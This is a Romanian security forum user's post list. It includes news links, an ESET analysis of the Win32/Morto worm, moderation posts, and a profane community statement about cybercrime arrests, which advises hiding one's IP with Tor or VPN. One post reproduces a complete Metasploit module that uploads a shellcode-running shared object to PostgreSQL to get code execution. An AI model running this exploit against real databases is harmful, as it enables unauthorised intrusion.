-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
[ROOT][sECURITY] Root exploit on Exynos by alephzain hree libraries seems to use /dev/exynos-mem: /system/lib/hw/camera.smdk4x12.so /system/lib/hw/gralloc.smdk4x12.so /system/lib/libhdmi.so Many devices are concerned : Samsung Galaxy S2 Samsung Galxy Note 2 MEIZU MX potentialy all devices who embed exynos processor (4210 and 4412) which use Samsung kernel sources. Restul povestii: http://forum.xda-developers.com/showthread.php?t=2048511
-
[h=1]Defrag Tools: #19 - WinDbg - OCA[/h] By: Larry Larsen, Andrew Richards, Chad Beeder In this week's episode of Defrag Tools, Graham McIntyre, Senior Developer from the Windows Reliability team, gives us an overview of Online Crash Analysis (OCA). Graham describes OCA and how dump collection has been enhanced in Windows 8. Resources: Debugging Tools for Windows Bugcheck 0x133 - DPC_WATCHDOG_VIOLATION Bugcheck 0x144 - BUGCODE_USB3_DRIVER Timeline: [00:00] Intro [01:00] "Send to Microsoft" does go somewhere! [02:00] What happens at a Bugcheck [08:00] OCA 'Buckets' [11:17] "Request for Additional Data" [12:09] OCA 'Solutions' [13:00] Data Mining [15:25] Trending issues [17:46] Firmware and DMA bugs caught by PFN tracking [19:32] Reliability History and Problem Reports [22:15] Event Viewer - 'Windows Error Reporting' source [23:38] 'Automatic' dump type [26:15] OEM/ISV/IHV Relationships [28:02] Bugcheck 0x133 - DPC_WATCHDOG_VIOLATION [30:30] !findxmldata [31:06] Bugcheck 0x144 - BUGCODE_USB3_DRIVER Video: http://channel9.msdn.com/Shows/Defrag-Tools/Defrag-Tools-19-WinDbg-OCA
-
Security/Robustness Assessment of IPv6 Neighbor Discovery Implementations version 0.1 November 2012 Fernando Gont www.si6networks.com Table of Contents 1. Introduction..............................................................................................................................3 2. Proposed tests with the ns6 tool.............................................................................................4 3. Proposed tests with the na6 tool.............................................................................................8 4. Proposed tests with the rs6 tool............................................................................................14 5. Proposed tests with the ra6 tool............................................................................................18 6. References............................................................................................................................27 Download: http://www.si6networks.com/tools/ipv6toolkit/si6networks-ipv6-nd-assessment.pdf
-
Pentru cei care nu stiu, sa aducem cateva lamuriri. Ce s-a intamplat? Totul a inceput asa: http://webtv.realitatea.net/gruparea-de-hackeri-rst-center-anihilata_904638.html Mai multe persoane au fost arestate pentru carding si vina a picat pe RST. De ce? Unele dintre persoanele arestate aveau cont aici. Aveti aici si videoclipul baietilor veseli: http://www.diicot.ro/images/videos/articles/28.11.2012.mp4 Ce e important: "efectuarea de opera?iuni frauduloase cu instrumente de plat? electronic?". Mai multe detalii in comunicatul lor de presa: http://www.diicot.ro/index.php/arhiva/782-comunicat-de-presa-27-11-2012 Screenshot: http://defcamp.ro/wp-content/uploads/2012/11/rst_poc.png Dupa cum puteti vedea si in comunicatul celor de la DIICOT, RST nu are nicio legatura directa cu acest sir de arestari. RST nu e un grup criminalistic (informational) organizat ci o comunitate publica destinata tinerilor pasionati de securitate IT. Tot ce are legatura cu frauda informationala, furtul cardurilor de credit, scam/phishing, skimming, licitatii false si multe altele, este STRICT INTERZIS pe RST. Problema a aparut deoarece printre persoanele arestate a fost si o victima colaterala, care hosta atat RST, cat si multe alte site-uri importante, printre care si zoso: http://defcamp.ro/wp-content/uploads/2012/11/zoso.ro_.png . Este penibil sa arestezi o persoana care gazduieste niste servere, nu avea cum sa stie ce se intampla pe fiecare server in parte, dar la cum functioneaza "justitita" in Romania ne putem astepta la orice. De ce un alt domeniu? Singura persoana care avea acces la vechiul domeniu, www.rstcenter.com, era tex, administrator RST si persoana care isi pierdea timpul hostand RST. Fiind arestat preventiv pentru 29 de zile, nu puteam avea acces la vechiul domeniu si am fost nevoiti sa alegem unul nou. Aceasta este o modificare temporara, speram ca tex sa fie eliberat, apoi vom vedea ce este de facut in continuare. Am revenit Era pacat ca o intreaga comunitate sa sufere din cauza unor "carderi", asadar am revenit. Vreau insa sa va atrag atentia asupra unor aspecte mai putin cunoscute de voi, mai exact asupra legilor din Romania. Stiu, nu sunt bine definite, se pot interpreta, dar e important ca exista, si mai important este ca din cauza lor puteti avea probleme si incercam sa evitam acest lucru. Legea 161/2003, "Prevenirea si combaterea criminalitatii informatice": http://www.legi-internet.ro/legislatie-itc/criminalitate-informatica/prevederi-legislative-privind-prevenirea-si-combaterea-criminalitatii-informatice.html , printre altele, spune si: CAPITOLUL III Infrac?iuni ?i contraven?ii SEC?IUNEA 1 Infrac?iuni contra confiden?ialit??ii ?i integrit??ii datelor ?i sistemelor informatice Art. 42. - (1) Accesul, f?r? drept, la un sistem informatic constituie infrac?iune ?i se pedepse?te cu închisoare de la 3 luni la 3 ani sau cu amend?. (2) Fapta prev?zut? la alin. (1), s?vâr?it? în scopul ob?inerii de date informatice, se pedepse?te cu închisoare de la 6 luni la 5 ani. (3) Dac? fapta prev?zut? la alin. (1) sau (2) este s?vâr?it? prin înc?lcarea m?surilor de securitate, pedeapsa este închisoarea de la 3 la 12 ani. Art. 43. - (1) Interceptarea, f?r? drept, a unei transmisii de date informatice care nu este public? ?i care este destinat? unui sistem informatic, provine dintr-un asemenea sistem sau se efectueaz? în cadrul unui sistem informatic constituie infrac?iune ?i se pedepse?te cu închisoare de la 2 la 7 ani. (2) Cu aceea?i pedeaps? se sanc?ioneaz? ?i interceptarea, f?r? drept, a unei emisii electromagnetice provenite dintr-un sistem informatic ce con?ine date informatice care nu sunt publice. Art. 44. - (1) Fapta de a modifica, ?terge sau deteriora date informatice ori de a restric?iona accesul la aceste date, f?r? drept, constituie infrac?iune ?i de pedepse?te cu închisoare de la 2 la 7 ani. (2) Transferul neautorizat de date dintr-un sistem informatic se pedepse?te cu închisoare de la 3 la 12 ani. (3) Cu pedeapsa prev?zut? la alin. (2) se sanc?ioneaz? ?i transferul neautorizat de date dintr-un mijloc de stocare a datelor informatice. Art. 45. - Fapta de a perturba grav, f?r? drept, func?ionarea unui sistem informatic, prin introducerea, transmiterea, modificarea, ?tergerea sau deteriorarea datelor informatice sau prin restric?ionarea accesului la aceste date constituie infrac?iune ?i se pedepse?te cu închisoare de la 3 la 15 ani. Art. 46. - (1) Constituie infrac?iune ?i se pedepse?te cu închisoare de la 1 la 6 ani: a) fapta de a produce, vinde, de a importa, distribui sau de a pune la dispozi?ie, sub orice alt? form?, f?r? drept, a unui dispozitiv sau program informatic conceput sau adaptat în scopul s?vâr?irii uneia dintre infrac?iunile prev?zute la art. 42-45; fapta de a produce, vinde, de a importa, distribui sau de a pune la dispozi?ie, sub orice alt? form?, f?r? drept, a unei parole, cod de acces sau alte asemenea date informatice care permit accesul total sau par?ial la un sistem informatic în scopul s?vâr?irii uneia dintre infrac?iunile prev?zute la art. 42-45. (2) Cu aceea?i pedeaps? se sanc?ioneaz? ?i de?inerea, f?r? drept, a unui dispozitiv, program informatic, parol?, cod de acces sau dat? informatic? dintre cele prev?zute la alin. (1) în scopul s?vâr?irii uneia dintre infrac?iunile prev?zute la art. 42-45. Art. 47. - Tentativa infrac?iunilor prev?zute la art. 42-46 se pedepse?te. SEC?IUNEA a 2-a Infrac?iuni informatice Art. 48. - Fapta de a introduce, modifica sau ?terge, f?r? drept, date informatice ori de a restric?iona, f?r? drept, accesul la aceste date, rezultând date necorespunz?toare adev?rului, în scopul de a fi utilizate în vederea producerii unei consecin?e juridice, constituie infrac?iune ?i se pedepse?te cu închisoare de la 2 la 7 ani. Art. 49. - Fapta de a cauza un prejudiciu patrimonial unei persoane prin introducerea, modificarea sau ?tergerea de date informatice, prin restric?ionarea accesului la aceste date ori prin împiedicarea în orice mod a func?ion?rii unui sistem informatic, în scopul de a ob?ine un beneficiu material pentru sine sau pentru altul, constituie infrac?iune ?i se pedepse?te cu închisoare de la 3 la 12 ani. Art. 50. - Tentativa infrac?iunilor prev?zute la art. 48 ?i 49 se pedepse?te. Ce inseamna asta? Folositi in pula mea Tor, VPN sau orice altceva pentru a va ascunde IP-ul cand faceti ceva. De asemenea aveti grija de "privacy", nu faceti publice date personale, invatati sa va "ascundeti". In urmatoarele zile vom lua cateva decizii legate de acest aspect aici. Diseara vom pune si certificatul SSL, nu va faceti griji pentru asta. Si in acest post incercati sa va abtineti de la comentarii idioate. Postati aici eventuale probleme ale forumului, ca si "nu merge sa postezi imagini". Stay safe!
-
[h=1]PostgreSQL for Linux Payload Execution[/h] ### # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'msf/core/exploit/postgres' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report # Creates an instance of this module. def initialize(info = {}) super(update_info(info, 'Name' => 'PostgreSQL for Linux Payload Execution', 'Description' => %q{ On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF Shared Libraries's from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object's constructor, it does not need to conform to specific Postgres API versions. }, 'Author' => [ 'midnitesnake', # this Metasploit module 'egypt', # on-the-fly compiled .so technique 'todb' # original windows module this is based on ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt' ] ], 'Platform' => 'linux', 'Payload' => { 'Space' => 65535, 'DisableNops' => true, }, 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86 } ], [ 'Linux x86_64', { 'Arch' => ARCH_X86_64 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 05 2007' )) deregister_options('SQL', 'RETURN_ROWSET') end # Buncha stuff to make typing easier. def username; datastore['USERNAME']; end def password; datastore['PASSWORD']; end def database; datastore['DATABASE']; end def rhost; datastore['rhost']; end def rport; datastore['rport']; end def verbose; datastore['VERBOSE']; end def bits; datastore['BITS'];end def execute_command(cmd, opts) postgres_sys_exec(cmd) end def exploit version = do_login(username,password,database) case version when :noauth; print_error "Authentication failed."; return when :noconn; print_error "Connection failed."; return else print_status("#{rhost}:#{rport} - #{version}") end fname = "/tmp/#{Rex::Text.rand_text_alpha(8)}.so" tbl,fld,so,oid = postgres_upload_binary_data(payload_so(fname), fname) unless tbl && fld && so && oid print_error "Could not upload the UDF SO" return end print_status "Uploaded #{so} as OID #{oid} to table #{tbl}(#{fld})" begin func_name = Rex::Text.rand_text_alpha(10) postgres_query( "create or replace function pg_temp.#{func_name}()"+ " returns void as '#{so}','#{func_name}'"+ " language 'C' strict immutable" ) rescue end postgres_logout if @postgres_conn end # Authenticate to the postgres server. # # Returns the version from #postgres_fingerprint def do_login(user=nil,pass=nil,database=nil) begin password = pass || postgres_password vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}") result = postgres_fingerprint( :db => database, :username => user, :password => password ) if result[:auth] report_service( :host => rhost, :port => rport, :name => "postgres", :info => result.values.first ) return result[:auth] else return :noauth end rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError return :noconn end end def payload_so(filename) shellcode = Rex::Text.to_hex(payload.encoded, "\\x") #shellcode = "\\xcc" c = %Q^ int _exit(int); int printf(const char*, ...); int perror(const char*); void *mmap(int, int, int, int, int, int); void *memcpy(void *, const void *, int); int mprotect(void *, int, int); int fork(); int unlink(const char *pathname); #define MAP_PRIVATE 2 #define MAP_ANONYMOUS 32 #define PROT_READ 1 #define PROT_WRITE 2 #define PROT_EXEC 4 #define PAGESIZE 0x1000 char shellcode[] = "#{shellcode}"; void run_payload(void) __attribute__((constructor)); void run_payload(void) { int (*fp)(); fp = mmap(0, PAGESIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); memcpy(fp, shellcode, sizeof(shellcode)); if (mprotect(fp, PAGESIZE, PROT_READ|PROT_WRITE|PROT_EXEC)) { _exit(1); } if (!fork()) { fp(); } unlink("#{filename}"); return; } ^ cpu = case target_arch.first when ARCH_X86; Metasm::Ia32.new when ARCH_X86_64; Metasm::X86_64.new end payload_so = Metasm::ELF.compile_c(cpu, c, "payload.c") so_file = payload_so.encode_string(:lib) so_file end end Sursa: http://www.exploit-db.com/exploits/23360/
-
Nu ma pricep, am incercat (si a mers) cu oclhashcat-plus. Altceva nici nu stiu.
-
Fail Trash. "Pentru 1000 de cuvinte introduse veti primi cate 1$/0.90 $/0.75 $/ depinde de oferta in fiecare saptamana" 1000 de cuvinte * 10 secunde/cuvant = 10000 de secunde. 10000 de secunde / 3600 = 2.5 ORE Cu alte cuvinte castigi 3 dolari / ZI lucrand 8 ore / ZI. Adica 100 de dolari pe luna. Castig mai mult daca stau sa caut monede pe jos.
-
Am si eu Nvidia GeForce 9500 GT la munca. Nu e cine stie ce, dar pare sa parcurga MD5 pentru [a-z] in 36 de minute. Speed........: 90980.1k c/s Real, 95113.0k c/s GPU Daca vreti las si eu peste noapte cate un hash.
-
"Deep Web con?ine 7500 de terabytes de informa?ii" De unde au scos rahatul asta? "Exista mai multe mult de 200.000 de site-uri Deep Web." Nu cred ca exista nici 200.000 de utilizatori Tor. "con?ine aproape 550 miliarde de documente individuale" Daca aici sunt cuprinse toate documentele private ale tuturor companiilor din lume, e (putin) posibil, dar "accesibile cu Tor" in niciun caz. ------------------ Da, traficanti si alte natii de oameni mai gasesti, au cam disparut si ei pentru ca e probabil plin de agenti infiltrati. Dar se spun prea multe cacaturi despre acest cica "Deep web" care nu e nici 10% din Internet si ce se gaseste public...
-
Lasa-ma sa ghicesc: - Conturi de pe cine stie ce site de cacat - Carduri salvate in baza de date a cine stie carui site de cacat Ultimii doi ani, pe 5 noiembrie: - 2011 - Cica picau Facebooku, ei, 30 de persoane cu LOIC vs miile de servere Facebook. Rezultatul: prima pula in cur pentru magicii Anonimusi - 2012 - Cica pica tot "Internetul" prin DDOS catre serverele DNS globale, ei, 30 de ratati cu LOIC vs servere ca si j.root-servers.net care e gazduit de VeriSign (si nu de oricine) pe 41 de servere. Rezultatul: a doua pula, mai groasa, in cur pentru ei. Acum ce fac? Stiu: Anonymous o sa suga pula lui Mos Craciun si ne dezvalui cat de mare e! Edit: Acum am vazut jegu de videoclip. Aici avem un loc special pentru asa ceva: Cosul de gunoi. Sa zici mersi ca nu iti dau ban.
-
1. Nu sunt 20 de topicuri despre cryptografie pe forum si nu am vazut prea multe topicuri create de tine pe aceasta tema. Cand vom vedea ca se posteaza despre crypto o data la 2-3 zile cel putin, atunci vom lua in considerare. 2. Nu am vazut prea multe proiecte ale membrilor in ultimii 3 ani. Iar o porcarie de crypter facut de altcineva pe care un membru scrie "by mine" nu e tocmai un proiect. De asemenea, un program de 20 de linii de cod care nu face mai nimic nu e un proiect. Faceti proiecte, veti fi usor de remarcat. 3. Ar fi cam inutil, nu am vazut prea multe posturi in care sa se vorbeasca despre alti membri, sa incercam sa nu transformam RST chiar in Facebook.
-
Merge acum?
-
[h=1]Win32/Morto – Made in China, now with PE file infection[/h]by Pierre-Marc Bureau Security Intelligence Program Manager In July 2012, our virus laboratory came across what we first thought was a new family of malware. The threat spread by infecting Portable Executable or PE files used by Windows, but this malware also infected systems through remote desktop and network shares. After further analysis, we realized we were dealing with a new version of a known malware family: Win32/Morto. The author of this malware – which had already infected thousands of hosts – had updated his creation to add file infection capabilities. Win32/Morto is best known for being a computer worm, that is, a fully-self-contained rogue program that spreads copies of itself. Adding file-infecting code allows the worm to function as a computer virus as well by attaching copies of itself to other programs which can then be used to further spread the infection. This type of evolution is out of the ordinary and it prompted us to dig further in order to understand this malware better. We are presenting the results of our analysis this week at the AVAR conference in HangZhou, China. This blog contains a summary of the key findings presented at the conference. Our analysis shows that adding file infection capabilities to this malware had a significant impact on the speed at which it spread. The next figure shows the number of detections of this threat over time. We clearly see a sharp increase in detections around July; this is when the malware was updated to start infecting PE files. Other characteristics of this malware have remained constant across variants. For example, Win32/Morto has been using the DNS infrastructure to receive commands from its operator. The bot will make a DNS TXT request and will decode the received text so as to update its modules. The figure below shows one such DNS TXT response with the encoded string, which contains the update information. The information is encoded using an algorithm close to base64, but with a different alphabet. The information received by the bot is simply a list of modules to be downloaded, decrypted and executed. During the last four months, we have seen three different modules being used by the bot. One of the modules is an update to the viral code used for maintaining persistence and infecting files, one module is used to spread by exploiting weak passwords in Remote Desktop and the last module is used to launch distributed denial of service attacks and to display advertisements on the infected system. There are several clues in the malware code that suggest it was written by a native Chinese speaker. For example, the User-Agent string used by the malware advertises the Chinese language. The geographical distribution of this threat also hints as to its origin. The following figure shows the geographical distribution of Win32/Morto detections. The dark blue color indicates a high proportion of detections while light yellow shows a small proportion of detections. The map shows a significant number of detections through Asia, including Mongolia, Tajikistan, Uzbekistan and China. This might also indicate where the infection started and continued to spread. The two main infection vectors of Win32/Morto are through file infection and the exploitation of weak Remote Desktop credentials. We recommend that users use strong passwords and use an up-to-date antivirus solution to help them stay protected from this threat. Acknowledgment: I would like to acknowledge François Chagnon and Miroslav Babis for their help in analyzing Win32/Morto. Sursa: Win32/Morto – Made in China, now with PE file infection | ESET ThreatBlog
-
[h=1]Microsoft Security Bulletin Summary for November 2012[/h]Published: Tuesday, November 13, 2012 | Updated: Wednesday, November 14, 2012 This bulletin summary lists security bulletins released for November2012. With the release of the security bulletins for November 2012, this bulletin summary replaces the bulletin advance notification originally issued November 8, 2012. For more information about the bulletin advance notification service, see Microsoft Security Bulletin Advance Notification. For information about how to receive automatic notifications whenever Microsoft security bulletins are issued, visit Microsoft Technical Security Notifications. Microsoft is hosting a webcast to address customer questions on these bulletins on November 14, 2012, at 11:00 AM Pacific Time (US & Canada). Register now for the November Security Bulletin Webcast. After this date, this webcast is available on-demand. Microsoft also provides information to help customers prioritize monthly security updates with any non-security updates that are being released on the same day as the monthly security updates. Please see the section, Other Information. [h=3]Bulletin Information[/h][h=4]Executive Summaries[/h]The following table summarizes the security bulletins for this month in order of severity. For details on affected software, see the next section, Affected Software and Download Locations. Vedeti link-ul: http://technet.microsoft.com/en-us/security/bulletin/ms12-nov Cam multe Remote Code Execution, deci "stay safe".
-
It is selling zero day vulnerability in Windows 8
Nytro replied to io.kent's topic in Stiri securitate
Ooo da, asa, pe fata... -
Ok, sper sa am diseara timp... 1. Fac o lista cu intrebari din domeniul securitatii IT 2. Intrebarile nu isi vor gasi raspuns usor pe Google si vreau raspunsuri "explicate" si vor fi din: putina programare, securitate web, sisteme de operare, retelistica, cunostinte generale 3. La intrebari se va raspunde pe mesenger pentru a ma asigura ca raspunsul vine prompt si nu se cauta ore pe Google 4. Dau ban tuturor care au dat like postului meu si celor care sunt de acord cu test la inregistrare 5. Astept sa ma contacteze (voi face un ID de mesenger pentru asta) 6. Le pun acele intrebari si daca nu raspund corect raman pe dinafara Asa e corect. Din moment ce unii au cont "free", altii de ce sa trebuiasca sa dea un test pentru a intra? Si cu aceasta ocazie ii verificam si pe cei care doresc acest lucru. De acord?
-
Apare un nou protocol care imbunatateste cu pana la 700% semnalul WiFi! de Redactia Hit | 15 noiembrie 2012 Cercetatorii de la NC State University (NCSU) au descoperit un noua cale de a amplifica si imbunatati retele WiFi. Dezvoltatorii vorbesc despre un protocol care imbunatateste cu pana la 700% semnalul! Partea cea mai interesanta a proiectului este ca nu vorbim despre infrastructura sau componente noi dezvoltate de cercetatori, ci doar despre software. Pachetul dezvoltat de cei de la NCSU monitorizeaza punctele de acces si reduce timpul de retransmitere a datelor catre utilizatori (tot printr-un singur canal). Asta inseamna ca pe actualele retele s-ar putea face, cu putin efort, un update pentru optimizarea semnalului. Noul protocol, denumit WiFox, descongestioneaza practic traficul de date din reteaua respectiva in momentul in care este folosita de un numar mare de utilizatori. Sursa: The Next Web Via: Apare un nou protocol care imbunatateste cu pana la 700% semnalul WiFi! | Hit.ro
-
Converting .docx to pdf (or .doc to pdf, or .doc to odt, etc.) with libreoffice on a webserver on the fly using php Vezi si asta: http://www.phplivedocx.org/
-
Postez aici pentru a nu deschide un nou topic. Mica rearanjare a categoriilor: "Web Design Stuff" a devenit "Web Development" si se regaseste sub sectiunea de "Programare" dupa cum probabil ati vazut.
-
Windows Research Kernel The Windows Academic Program supplies universities with concepts, code, and projects useful for integrating core Windows® kernel technologies into teaching and research. The program includes Windows OS Internals Curriculum Resource Kit (CRK), ProjectOZ, and Windows Research Kernel. These components illustrate real-world examples of the principles taught in class and provide source code and materials for academic purposes. You can explore the program resources using the Online Resource Kit or download the components below. Download: http://jacekowski.org/WindowsResearchKernel-WRK.zip http://www.filetransfer.ro/5tk72D http://www.multiupload.nl/C0CW6Y105G http://www.speedyshare.com/8dR72/WindowsResearchKernel-WRK.zip A se vedea si: http://kernelexplorer.net/blogs/kore/archive/2009/04/19/Building-the-Windows-kernel.aspx
-
- 1
-
-
PDF Search Engine http://openpdf.info/ Mi se pare foarte util, gaseste link-uri directe.